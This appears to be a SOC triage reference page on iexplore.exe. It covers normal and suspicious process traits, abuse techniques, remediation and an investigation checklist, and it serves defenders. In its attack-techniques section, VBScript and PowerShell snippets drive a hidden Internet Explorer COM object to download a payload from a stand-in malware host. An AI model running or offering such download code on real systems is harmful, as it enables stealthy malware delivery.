Critical RiskWindowsLegitimateCommonly Abused
iexplore.exeWEB BROWSER

iexplore.exe - Internet Explorer Security Analysis

iexplore.exe is **Microsoft Internet Explorer**, a legacy browser officially retired but still present on Windows systems. IE's **legacy COM interfaces** and **poor security model** make it a **favorite target for malware**. Attackers abuse iexplore.exe for **COM-based downloads**, **process injection**, and leveraging its trusted status to bypass application controls.

Risk Summary

CRITICAL priority for SOC triage. iexplore.exe is deprecated but still exploited. Its presence in modern attack chains usually indicates **malicious activity**. Monitor for unexpected launches, especially from cmd.exe/powershell.exe, and its use for downloading files via COM automation.

Overview

What is iexplore.exe?

iexplore.exe is Microsoft Internet Explorer, a legacy web browser that has been officially retired.

History

  • Retirement: June 2022 (Win 10), earlier for Win 11
  • Still Present: Exists on Windows for compatibility
  • Replaced By: Microsoft Edge

Why Still Relevant

Attacker Value:

  • Pre-installed on Windows
  • Trusted Microsoft binary
  • COM automation capabilities
  • Legacy vulnerabilities

Security Significance

  • Deprecated Security: No longer receiving full updates
  • COM Exploitation: Heavily abused for downloads
  • Process Injection Target: Common injection host
  • Application Control Bypass: Trusted binary status

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\Program Files\Internet Explorer\iexplore.exe
Parentexplorer.exe (rare, legitimate)
InstancesUsually 0 (deprecated)
UserLogged-in user
NetworkShould be rare/none

Modern Reality

In modern environments, iexplore.exe running is unusual and warrants investigation.

⚠️ iexplore.exe activity in 2024+ is suspicious by default

Legacy Process Model

iexplore.exe (frame process)
└── iexplore.exe (tab process, optional)

Common Locations

C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Rare)

Path:        C:\Program Files\Internet Explorer\iexplore.exe
Parent:      explorer.exe
User:        Logged-in user
Context:     Legacy application requirement

SUSPICIOUS (Common)

Path:        C:\Temp\iexplore.exe
Parent:      cmd.exe, powershell.exe, wscript.exe
User:        SYSTEM (unexpected)
Context:     No business justification for IE use
Behavior:    Downloading files, visiting unknown URLs

Default Assumption

ContextAssumptionAction
ServerSUSPICIOUSInvestigate
Modern WorkstationSUSPICIOUSInvestigate
Legacy App RequirementVerifyDocument exception
Automated LaunchMALICIOUSContain immediately

Abuse Techniques

Attack Techniques

Technique #1: COM-Based Download (T1105)

Malicious Download via COM:

' VBScript using IE COM object
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://malware.com/payload.exe"
Do While ie.Busy : WScript.Sleep 100 : Loop

PowerShell Variant:

$ie = New-Object -ComObject InternetExplorer.Application
$ie.Visible = $false
$ie.Navigate("http://malware.com/payload.exe")

Technique #2: Living-off-the-Land

Using IE for C2:

  • Trusted binary status
  • Legitimate network behavior
  • Bypasses application whitelisting

Technique #3: Process Injection Target (T1055)

Malware injects into iexplore.exe because:

  • Trusted process
  • Expected to have network activity
  • Often allowed through firewalls

Technique #4: Browser Pivoting (T1185)

Injecting into IE to:

  • Steal session cookies
  • Perform actions as user
  • Access authenticated web applications

Remediation Steps

Protection and Remediation

Defense: Disable Internet Explorer

Via DISM:

dism /online /Disable-Feature /FeatureName:Internet-Explorer-Optional-amd64 /NoRestart

Via Group Policy:

Computer Configuration → Administrative Templates → 
Windows Components → Internet Explorer → 
Disable Internet Explorer 11 as a standalone browser

Defense: Application Control

Block iexplore.exe execution except for documented exceptions.

If Compromise Suspected

  1. Terminate all iexplore.exe processes
  2. Identify parent process chain
  3. Check for downloaded files
  4. Review IE history/cache
  5. Scan for persistence mechanisms
  6. Check for COM object abuse

Investigation Checklist

Investigation Checklist

  • Determine business justification for IE usage
  • Identify parent process launching IE
  • Check if window is visible or hidden
  • Review command line arguments
  • Examine network connections
  • Check IE history and cache
  • Look for downloaded files
  • Scan for process injection
  • Verify no scheduled tasks launching IE

MITRE ATT&CK Techniques

Last verified: January 18, 2026